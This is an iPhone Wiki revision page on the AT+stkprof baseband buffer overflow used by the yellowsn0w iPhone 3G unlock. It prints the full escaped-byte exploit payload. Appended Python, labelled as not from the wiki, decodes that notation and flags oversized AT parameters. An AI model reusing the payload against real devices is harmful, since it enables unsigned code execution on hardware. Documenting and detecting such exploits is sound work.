Difference between revisions of "AT+stkprof"

From The iPhone Wiki
Older revision: m (Implementation)
Newer revision: (New Implementation (yellowsn0w 0.9.8): better display)

Revision as of 01:05, 9 May 2009

Used as an injection vector for the first iPhone 3G unlock payload.

Credit

geohot

Exploit

There is a stack-based buffer overflow in the at+stkprof command that allows unsigned code execution on the iPhone 3G baseband.

Implementation

The Dev Team used this exploit in the first public iPhone 3G unlock, called yellowsn0w. It is available from Cydia and runs as a background daemon that injects their payload whenever the baseband is reset.

The source code (for the old version, 0.9.1) is also available here [1].

New Implementation (yellowsn0w 0.9.8)

In the newest yellowsn0w, this command is still the injection vector for the exploit, but it is used differently. It is still the at+stkprof command, but the whole payload now appears to be sent in a single command, shown below.

at+stkprof=1,"064a541c044b1878222803d0107001320133f8e720470000bf
9f154000170100546e5640200000005c130100266e5640ddddddddeeeeeeeeb8
905120000000001010101020202020611301000c000000";"\x10\x32\x0F\x27
\xBA\x43\x17\x1C\x0E\xA4\x0B\xA5\x01\x35\x21\x78\x78\x29\x0C\xD0
\xA8\x47\x0B\x01\x61\x78\xA8\x47\xC0\x46\xC0\x46\xC0\x46\xC0\x46
\xC9\x18\x11\x70\x02\x34\x01\x32\xEF\xE7\xC0\x46\xC0\x46\x01\x37
\x38\x47\x30\x30\x41\x29\x01\xDA09pG79pG024803A1013101601FBD0000
4C711140F0B51C4B80268BB03601188008911A4C301CA047002509909820A047
071CC56080204000A047802214495200144B041C9847099B0193442303930A23
013405930C23221C06930F49009502960495381C00230D4CA047021C002804D1
0B4908980B4B984703E00B490898094B"

Information on how this was used can be found here.
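As an added example (not code from this page or from yellowsn0w), the following Python decodes the two notations the wiki uses for this command (the older revision's all-\xNN form and the newer mixed form), splits the AT line into its parameters, and applies the kind of parameter-length check a logging or filtering layer could use to spot an oversized at+stkprof argument. The sample fragments are constructed from the first bytes of the payload above; treating ';' as a parameter separator and the length limit are assumptions, since the page does not state how the modem tokenises the line or how large the overflowed buffer is.

```python
import re

# Constructed fragments of the page's two notations for one command: the older
# revision escapes every byte as \xNN, the newer writes printable bytes literally.
OLD_STYLE = r'at+stkprof=1,"\x30\x36\x34\x61\x35\x34\x31\x63\x22\x3B\x22\x10\x32\x0F\x27\xBA\x43\x17\x1C"'
NEW_STYLE = r'at+stkprof=1,"064a541c";"\x10\x32\x0F\x27\xBA\x43\x17\x1C"'
ESC = re.compile(r'\\x([0-9A-Fa-f]{2})')
AT_LINE = re.compile(rb'^at\+([a-z]+)=(.*)$', re.IGNORECASE | re.DOTALL)

def unescape(text: str) -> bytes:
    """Wiki notation -> bytes on the AT link: \\xNN is one byte, all else literal."""
    out, pos = bytearray(), 0
    for m in ESC.finditer(text):
        out += text[pos:m.start()].encode('latin-1')
        out.append(int(m.group(1), 16))
        pos = m.end()
    out += text[pos:].encode('latin-1')
    return bytes(out)

def parse_at(wire: bytes):
    """Split an AT command into (name, params): quoted params as raw bytes, bare
    numbers as int. ',' and ';' both separate params here, matching the page's
    line layout (an assumption about how the modem tokenises it)."""
    m = AT_LINE.match(wire)
    if not m:
        raise ValueError('not an AT command line')
    name, rest = m.group(1).decode('ascii').lower(), m.group(2)
    params, i = [], 0
    while i < len(rest):
        c = rest[i:i + 1]
        if c in (b',', b';'):
            i += 1
        elif c == b'"':
            end = rest.index(b'"', i + 1)  # ValueError if unterminated
            params.append(rest[i + 1:end])
            i = end + 1
        else:
            j = i
            while j < len(rest) and rest[j:j + 1] not in (b',', b';'):
                j += 1
            params.append(int(rest[i:j]))
            i = j
    return name, params

def oversized_params(wire: bytes, limit: int):
    """Defender-side check: (index, length) of each string param longer than
    `limit`. The page gives no buffer size, so `limit` is the caller's assumption."""
    _, params = parse_at(wire)
    return [(i, len(p)) for i, p in enumerate(params)
            if isinstance(p, bytes) and len(p) > limit]
```

Decoding both constructed fragments yields identical bytes, which is what the "better display" revision changed: only the notation, not what is sent.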